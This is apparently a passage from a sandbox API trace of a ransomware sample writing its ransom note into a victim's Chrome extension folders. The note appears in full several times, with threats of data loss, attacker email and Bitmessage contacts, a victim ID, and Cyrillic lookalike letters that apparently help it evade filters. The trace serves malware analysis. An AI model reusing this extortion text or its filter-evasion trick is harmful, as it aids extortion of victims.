COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.161] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.162] CloseHandle (hObject=0x2ec) returned 1 [0291.162] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\#readme_eman#.rtf")) returned 0xffffffff [0291.162] GetLastError () returned 0x2 [0291.162] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_pt\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.163] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.163] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d 